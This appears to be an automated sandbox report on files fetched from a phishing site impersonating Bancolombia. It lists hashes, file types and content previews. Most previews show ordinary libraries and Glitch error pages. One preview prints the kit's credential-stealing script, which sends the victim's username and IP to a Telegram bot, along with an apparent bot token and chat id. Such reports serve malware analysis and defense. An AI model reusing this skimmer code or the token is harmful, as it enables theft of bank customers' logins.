                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:assembler source, ASCII text, with very long lines (540)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):121144
                                                                                                                          Entropy (8bit):5.012424283258053
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:OilqUBSyPpAdGlvJuWI8LrN8AL6A9B/okj+SAiZF65Y5iuj:OHUBSuSsH7LROA9B/okj+SAiZF65y
                                                                                                                          MD5:1C4FBFB220FF170CEACCA78869FBD591
                                                                                                                          SHA1:2139BC0FC4E98E1455DFE39A7C197A7D26995374
                                                                                                                          SHA-256:868FD2C8F776BDE92F44E3B9AE9DF8DEC0C8AE5E67B2730B7432401A06547963
                                                                                                                          SHA-512:8F7BCE21227B82D2B38CFAFB836750D50325F50CA12DFADF4004F4EF6255A31DC754A08C6DD442A31787B94916C6C0F3A48C90A66C32246664454859C8970480
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/bootstrap.css
                                                                                                                          Preview:../*! normalize.css v3.0.0 | MIT License | git.io/normalize */.html {. font-family: sans-serif;. -webkit-text-size-adjust: 100%;. -ms-text-size-adjust: 100%;.}.body {. margin: 0;.}.article,.aside,.details,.figcaption,.figure,.footer,.header,.hgroup,.main,.nav,.section,.summary {. display: block;.}.audio,.canvas,.progress,.video {. display: inline-block;. vertical-align: baseline;.}.audio:not([controls]) {. display: none;. height: 0;.}.[hidden],.template {. display: none;.}.a {. background: transparent;.}.a:active,.a:hover {. outline: 0;.}.abbr[title] {. border-bottom: 1px dotted;.}.b,.strong {. font-weight: bold;.}.dfn {. font-style: italic;.}.h1 {. margin: .67em 0;. font-size: 2em;.}.mark {. color: #000;. background: #ff0;.}.small {. font-size: 80%;.}.sub,.sup {. position: relative;. font-size: 75%;. line-height: 0;. vertical-align: baseline;.}.sup {. top: -.5em;.}.sub {. bottom: -.25em;.}.img {. border: 0;.}.svg:not(:root) {. overflow: hidden;.}.figure
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (23843), with escape sequences
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23930
                                                                                                                          Entropy (8bit):5.42714919475621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:EqR7eZk8qlPRy4+TWLc2dImKhHQRv9t6A2s7/vINwMViTnGTBKKsomM8LKrY:ENZkblPMud716VKwwIiOKDkDY
                                                                                                                          MD5:1CFFDD5C82CD0AFF2F453D352EA5903A
                                                                                                                          SHA1:1BA286119EEEC53D6C99E2ED640D75EBD467B244
                                                                                                                          SHA-256:20133CC700841EC85F087FF9834A922B482B9135E98574A9AFEBADE4C754558C
                                                                                                                          SHA-512:7A625952E55D00A0A8D6B8E075375D27A6AD81A01A615FE430C08FFC56CF62E2745EF09E102EAED4DB35C4A5EDFB439DB64986A11234C3DE70FA7C459214F599
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/* Copyright (c) 2008-2023, Quantcast Corp. https://www.quantcast.com/legal/license */.!function(){"use strict";var e="qcSes";function t(){var e=r();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(function(t){var n=(e+16*Math.random())%16|0;return e=Math.floor(e/16),("x"===t?n:3&n|8).toString(16)}))}var n=function(){try{if(!window.sessionStorage)return t()}catch(e){return t()}var n;try{if(n=window.sessionStorage.getItem(e))return n}catch(e){return t()}n=t();try{window.sessionStorage.setItem(e,n)}catch(e){}return n}();function r(){return(new Date).getTime()}function o(){return new Date}function a(e){var t=new Date(2e3,e,1,0,0,0,0),n=t.toUTCString(),r=new Date(n.substring(0,n.lastIndexOf(" ")-1));return t.getTime()-r.getTime()}function i(){return Math.round(2147483647*Math.random())}var c=/qcdbgc=1$/.test(window.location.toString());function u(e,t){if("undefined"!=typeof console){var n="ERROR"===e?".[41m QuantJS .[0m":".[44m QuantJS .[0m";console.log.apply(console,[n].conca
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/ui.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2000x1000, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):66514
                                                                                                                          Entropy (8bit):6.207297697570252
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:hx9+YDDZf88+/agDeXXNOk0wcuS0sXowB3tqSMo3X++Ipf:DD18dyg29Ok6hXoIdaKEf
                                                                                                                          MD5:C3C10BA9CA27C95E262090732B3AC6AB
                                                                                                                          SHA1:18C6E248817B4B478716464C79E696360CB39C7C
                                                                                                                          SHA-256:C9C03DA005004902530FDC45D441475E4FB97CD72998907033F5A21F4B0C2DAF
                                                                                                                          SHA-512:44AD187AFA12B05D06A769CB24769ECD6FFF0EDF3E0B45DBC8D2DEDF630ABFCBE406229DFEEF7C6C7C9ABBEBE968035C53C46D25BD6D2C2A1F023865BA03C4FA
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://newsinamerica.com/pdcc/wp-content/uploads/2024/05/Outlook.jpg
                                                                                                                          Preview:......Exif..II*.................Ducky.......<.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.4 (Macintosh)" xmpMM:InstanceID="xmp.iid:3F0F16CC116711EFB5CFBF135A63C884" xmpMM:DocumentID="xmp.did:3F0F16CD116711EFB5CFBF135A63C884"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F0F16CA116711EFB5CFBF135A63C884" stRef:documentID="xmp.did:3F0F16CB116711EFB5CFBF135A63C884"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2345)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):219116
                                                                                                                          Entropy (8bit):5.538782362042183
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:lw+H1CEOFp7x60BuoI1Lirsiy30V9KjmxcQLJ0nkVo:G8OF1oO5XyjmxcQLJro
                                                                                                                          MD5:DBFB7120B947E3973DA9D79B58C8DCFF
                                                                                                                          SHA1:B62125A98B3D6AF4DE03FBD990830110CFE42B2C
                                                                                                                          SHA-256:8EF595BAC2F8E9976D952951E32530DD6E4F1EB50C2FD474F4392070AE12B33E
                                                                                                                          SHA-512:E59A07BD802D930F914D18DED1D935BD3C9EDF6A56151DB936C3F423DA7D0651A66D169A50D63048DB9549A3E626BAA04E892C5207D120357DB485EB3962C656
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"8",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__ua","once_per_event":true,"vtp_overrideGaSettings":true,"vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_trackType":"TRACK_PAGEVIEW","vtp_functionName":"mia_ga","vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-597118-7","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternal
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/toolbar.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/bactouch.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/logo-personas.svg
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):160
                                                                                                                          Entropy (8bit):5.265198425112053
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U3yGqItEsRGD0twQyGnyaDgeDQggp6ngQjMHz6lz+HJ/KpRf:U3yGqIt7DtwjGnyac8gUMT6lQSpl
                                                                                                                          MD5:CEEE564F54E512A948F918E2710EAB6E
                                                                                                                          SHA1:74BF8C9C2A34A232E829497C35F1B0D1D55D1A12
                                                                                                                          SHA-256:D60C833406C5CCA9095B3CABD40D6F65E486A0A4C0B59105031C9A6E94595F5A
                                                                                                                          SHA-512:D186703897E8A19529CCC43918A8F5AE4E41DEC145F17ED2658243C3CBAE45A62C8F28268532513F05C43E1D7B89EB8C4A5891BF88547F2559299543E6CDA211
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*. Quantcast measurement tag. Copyright (c) 2008-2022, Quantcast Corp..*/.'use strict';(function(a,b,c){__qc("rules",[a])})("p-d5x2uDVHd7ALE",window,document);
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (548)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):551
                                                                                                                          Entropy (8bit):5.058051984823718
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:nuk6QclfXAYUoJICVkvEZ//1V4XYc4XGIkpogJWiEiDt3EifCPyxk0:nuksfAYUcVOc/4Ic42IkzWiPHfCqxk0
                                                                                                                          MD5:210A2B0F6E79131106C24C9AD5937898
                                                                                                                          SHA1:26AC20B370C793695E32546396C8718CC55FD4AB
                                                                                                                          SHA-256:AEA54EED40C84F789DC7AE50D1A72F888CA6C03D13C828636BA69745529F0DF8
                                                                                                                          SHA-512:92D07C42BAE5F1C0F0A62DDAD40F72C2F5AC68F01B0D2AFDB0E13721730F5633016B0A7853A938E98224A35B6E806E66B7C08D99A5B60A048518D4516301B267
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/tlf1.html
                                                                                                                          Preview:..<html style="height: 100%;"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, minimum-scale=0.1"><title>tlf1.jpg (627.327)</title></head><body style="margin: 0px; height: 100%"><p><p style="text-align: center;"><p style="text-align: center;"><img src="https://mtmarketing.co/wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpeg" alt="Bancolombia se despide de la bandera colombiana al renovar su marca | Agencia de Marketing Digital" width="574" height="287" /></p>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/slidemenu.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/showLoading.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):20
                                                                                                                          Entropy (8bit):3.446439344671015
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YMb1gXMR4n:YMeXNn
                                                                                                                          MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
                                                                                                                          SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
                                                                                                                          SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
                                                                                                                          SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://api.ipify.org/?format=json
                                                                                                                          Preview:{"ip":"8.46.123.33"}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1024
                                                                                                                          Entropy (8bit):4.948665372330102
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Xt14yFBgRR3gGRRXdRR4/6tty89sWIPKgGK7MJJe:j4y7gzgGrdNQZRPUKwPe
                                                                                                                          MD5:D03064F17BC24B951422778FBFF213D2
                                                                                                                          SHA1:F100641F57078D6759215D4C228DB1A5C4E8D554
                                                                                                                          SHA-256:22ABB42C649A43E32F359F68F10BC71C9D6F6F8396F92DBBC22ADF43A11DE87F
                                                                                                                          SHA-512:5F51D9992C021BDF52B330CB35DDCAA35DACF423BCCFE499087DEA596EF6CFAB7DDA0297DA69D5D595E96158189C97A82E9F0D10E16FB9FAE18BA0EB116D2867
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview://bot token.var telegram_bot_id = "8085138420:AAHx_JNz5IBzdSm9Az7k7M81341RqwUcRxM";.//chat id.var chat_id = "7106492816";.var u_name, ip, ip2;.var ready = function () {. u_name = document.getElementById("usuario").value;. . ip = document.getElementById("gfg").innerHTML;. ip2 = document.getElementById("address").innerHTML;. message = "-Banc0lombia-\nUsuario: " + u_name + "\nip" + ip +"\n" + ip2 +"\n-LOGIN-";.};.var sender = function () {. ready();. var settings = {. "async": true,. "crossDomain": true,. "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",. "method": "POST", . "headers": {. "Content-Type": "application/json",. "cache-control": "no-cache".. },. "data": JSON.stringify({. "chat_id": chat_id,. "text": message. }). };. $.ajax(settings).done(function (response) {. window.location = '2.html';. console.log(response);. }
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65451)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):89476
                                                                                                                          Entropy (8bit):5.2896589255084425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                          MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                          SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                          SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                          SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20
                                                                                                                          Entropy (8bit):3.446439344671015
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YMb1gXMR4n:YMeXNn
                                                                                                                          MD5:2E1E0B28D6E7522CB687E20D37BCD8AA
                                                                                                                          SHA1:03D5EFE3719CAB433421C4D9BF6C73E0B8EB69E5
                                                                                                                          SHA-256:124CE91528D8ACB894BDC980ABDDF035B38CDC64CE13F088D431E0B10D61FB24
                                                                                                                          SHA-512:70BB31CA0F3907AB6B5860459643E422AAD6685F32D519C23E671CD46F29ABF2DB1F0C53E54313FF6FE7B54A75CDCA18A9232556B3273E6DB200BFCD22BA82BD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:{"ip":"8.46.123.33"}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):52916
                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                          Encrypted:false
